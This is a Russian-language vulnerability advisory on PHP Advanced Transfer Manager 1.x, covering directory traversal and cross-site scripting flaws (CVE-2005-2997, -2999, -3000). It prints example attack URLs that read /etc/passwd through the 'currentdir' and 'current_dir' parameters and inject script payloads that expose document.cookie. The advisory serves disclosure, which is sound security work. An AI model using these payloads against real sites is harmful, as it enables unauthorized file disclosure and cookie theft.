Обход каталога и межсайтовый скриптинг в PHP Advanced Transfer Manager

Дата публикации:
20.09.2005
Дата изменения:
29.03.2008
Всего просмотров:
2260
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2997
CVE-2005-2999
CVE-2005-3000
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP Advanced Transfer Manager 1.x
Уязвимые версии: PHP Advanced Transfer Manager

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и просмотреть произвольные файлы на системе.

1. Уязвимость существует из-за того, что программное обеспечение не обрабатывает должным образом входные данные в параметрах 'currentdir' и 'current_dir'. Удаленный пользователь может с помощью специально сформированного URL, содержащего символы обхода каталога, просмотреть произвольные файлы на системе с привилегиями Web сервера. Пример:

http://[target]/[path]/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
http://[target]/[path]/viewers/txt.php?c urrentdir=../../../../../../../etc&filename=passwd
http://[target]/[path]/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
http://[target]/[path]/viewers/ htm.php?current_dir=../../../../../../../etc&filename=passwd
http://[target]/[path]/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
http://[target]/[pat h]/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
http://[target]/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
http://[target]/phpatm/viewers/zip.php?current_dir=../../../.. /../../..&filename=[filename].zip

2. Межсайтовый скриптинг возможен из-за отсутствия проверки входных данных в некоторых переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/[path]/viewers/txt.php?font=% 22%
3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path]/viewers/txt.php?normalfontcolor=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http:/ /[target]/[path]/viewers/txt.php?mess[31]=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

URL производителей: phpatm.free.fr

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scripting

или введите имя

CAPTCHA